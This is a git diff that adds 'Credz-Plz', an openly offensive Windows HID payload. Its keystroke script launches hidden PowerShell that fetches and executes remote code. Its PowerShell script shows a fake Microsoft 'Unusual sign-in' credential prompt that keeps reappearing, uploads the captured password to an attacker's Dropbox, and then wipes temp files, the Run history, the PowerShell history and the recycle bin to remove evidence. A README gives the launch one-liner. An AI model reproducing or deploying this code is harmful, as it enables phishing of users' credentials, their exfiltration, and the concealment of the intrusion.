diff --git a/Payloads/Flip-Credz-Plz/Credz-Plz-Execute.txt b/Payloads/Flip-Credz-Plz/Credz-Plz-Execute.txt new file mode 100644 index 0000000..8ee8c8f --- /dev/null +++ b/Payloads/Flip-Credz-Plz/Credz-Plz-Execute.txt @@ -0,0 +1,15 @@ +REM Title: Credz-Plz + +REM Author: I am Jakoby + +REM Description: This payload is meant to prompt the target to enter their creds to later be exfiltrated with dropbox. See README.md file for more details. + +REM Target: Windows 10, 11 + +GUI r +DELAY 500 +STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl +ENTER + +REM Remember to replace the link with your DropBox shared link for the intended file to download +REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly diff --git a/Payloads/Flip-Credz-Plz/Credz-Plz.ps1 b/Payloads/Flip-Credz-Plz/Credz-Plz.ps1 new file mode 100644 index 0000000..3a2320e --- /dev/null +++ b/Payloads/Flip-Credz-Plz/Credz-Plz.ps1 @@ -0,0 +1,175 @@ +############################################################################################################################################################ +# | ___ _ _ _ # ,d88b.d88b # +# Title : Credz-Plz | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 # +# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' # +# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' # +# Category : Credentials | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' # +# Target : Windows 7,10,11 | |___/ # /\/|_ __/\\ # +# Mode : HID | |\__/,| (`\ # / -\ /- ~\ # +# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / # +# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo # +# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ # +#__________________________________|_________________________________________________________________________# | | ) ~ ( # +# # / \ / ~ \ # +# github.com/I-Am-Jakoby # \ / \~ ~/ # +# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_# +# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |# +# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |# +############################################################################################################################################################ + +<# +.SYNOPSIS + This script is meant to trick your target into sharing their credentials through a fake authentication pop up message + +.DESCRIPTION + A pop up box will let the target know "Unusual sign-in. Please authenticate your Microsoft Account" + This will be followed by a fake authentication ui prompt. + If the target tried to "X" out, hit "CANCEL" or while the password box is empty hit "OK" the prompt will continuously re pop up + Once the target enters their credentials their information will be uploaded to your dropbox for collection + +.Link + https://developers.dropbox.com/oauth-guide # Guide for setting up your DropBox for uploads + +#> + +#------------------------------------------------------------------------------------------------------------------------------------ + +$DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN" + +#------------------------------------------------------------------------------------------------------------------------------------ + +$FileName = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_User-Creds.txt" + +#------------------------------------------------------------------------------------------------------------------------------------ + +<# + +.NOTES + This is to generate the ui.prompt you will use to harvest their credentials +#> + +function Get-Creds { +do{ +$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+[Environment]::UserName,[Environment]::UserDomainName); $cred.getnetworkcredential().password + if([string]::IsNullOrWhiteSpace([Net.NetworkCredential]::new('', $cred.Password).Password)) { + [System.Windows.Forms.MessageBox]::Show("Credentials can not be empty!") + Get-Creds +} +$creds = $cred.GetNetworkCredential() | fl +return $creds + # ... + + $done = $true +} until ($done) + +} + +#---------------------------------------------------------------------------------------------------- + +<# + +.NOTES + This is to pause the script until a mouse movement is detected +#> + +function Pause-Script{ +Add-Type -AssemblyName System.Windows.Forms +$originalPOS = [System.Windows.Forms.Cursor]::Position.X +$o=New-Object -ComObject WScript.Shell + + while (1) { + $pauseTime = 3 + if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){ + break + } + else { + $o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime + } + } +} + +#---------------------------------------------------------------------------------------------------- + +# This script repeadedly presses the capslock button, this snippet will make sure capslock is turned back off + +function Caps-Off { +Add-Type -AssemblyName System.Windows.Forms +$caps = [System.Windows.Forms.Control]::IsKeyLocked('CapsLock') + +#If true, toggle CapsLock key, to ensure that the script doesn't fail +if ($caps -eq $true){ + +$key = New-Object -ComObject WScript.Shell +$key.SendKeys('{CapsLock}') +} +} +#---------------------------------------------------------------------------------------------------- + +<# + +.NOTES + This is to call the function to pause the script until a mouse movement is detected then activate the pop-up +#> + +Pause-Script + +Caps-Off + +Add-Type -AssemblyName System.Windows.Forms + +[System.Windows.Forms.MessageBox]::Show("Unusual sign-in. Please authenticate your Microsoft Account") + +$creds = Get-Creds + +#------------------------------------------------------------------------------------------------------------------------------------ + +<# + +.NOTES + This is to save the gathered credentials to a file in the temp directory +#> + +echo $creds >> $env:TMP\$FileName + +#------------------------------------------------------------------------------------------------------------------------------------ + +<# + +.NOTES + This is to upload your files to dropbox +#> + +$TargetFilePath="/$FileName" +$SourceFilePath="$env:TMP\$FileName" +$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' +$authorization = "Bearer " + $DropBoxAccessToken +$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" +$headers.Add("Authorization", $authorization) +$headers.Add("Dropbox-API-Arg", $arg) +$headers.Add("Content-Type", 'application/octet-stream') +Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers + +#------------------------------------------------------------------------------------------------------------------------------------ + +<# + +.NOTES + This is to clean up behind you and remove any evidence to prove you were there +#> + +# Delete contents of Temp folder + +rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue + +# Delete run box history + +reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f + +# Delete powershell history + +Remove-Item (Get-PSreadlineOption).HistorySavePath + +# Deletes contents of recycle bin + +Clear-RecycleBin -Force -ErrorAction SilentlyContinue + diff --git a/Payloads/Flip-Credz-Plz/README.md b/Payloads/Flip-Credz-Plz/README.md new file mode 100644 index 0000000..0f9b198 --- /dev/null +++ b/Payloads/Flip-Credz-Plz/README.md @@ -0,0 +1,102 @@ +![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) + + +
+ Table of Contents +
    +
  1. Description
    2. +
  2. Getting Started
    3. +
  3. Contributing
    4. +
  4. Version History
    5. +
  5. Contact
    6. +
  6. Acknowledgments
    7. +
+
+ +# Credz-Plz + +A script used to prompt the target to enter their creds to later be exfiltrated with dropbox. + +## Description + +A pop up box will let the target know "Unusual sign-in. Please authenticate your Microsoft Account" +This will be followed by a fake authentication ui prompt. +If the target tried to "X" out, hit "CANCEL" or while the password box is empty hit "OK" the prompt will continuously re pop up +Once the target enters their credentials their information will be uploaded to your dropbox for collection + +![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG/Payloads/OMG-Credz-Plz/unusual-sign-in.jpg) + +![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG/Payloads/OMG-Credz-Plz/sign-in.jpg) + +## Getting Started + +### Dependencies + +* DropBox or other file sharing service - Your Shared link for the intended file +* Windows 10,11 + +

(back to top)

+ +### Executing program + +* Plug in your device +* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory +``` +powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl +``` + +

(back to top)

+ +## Contributing + +All contributors names will be listed here + +I am Jakoby + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +

I am Jakoby

+


+ + + + + + + + + + + + + + + + + + + + Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-ADV-Recon) +

+ + + +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [MG](https://github.com/OMG-MG) + +

(back to top)

diff --git a/Payloads/Flip-Credz-Plz/sign-in.jpg b/Payloads/Flip-Credz-Plz/sign-in.jpg new file mode 100644 index 0000000..3330e2a Binary files /dev/null and b/Payloads/Flip-Credz-Plz/sign-in.jpg differ diff --git a/Payloads/Flip-Credz-Plz/unusual-sign-in.jpg b/Payloads/Flip-Credz-Plz/unusual-sign-in.jpg new file mode 100644 index 0000000..ff0aad9 Binary files /dev/null and b/Payloads/Flip-Credz-Plz/unusual-sign-in.jpg differ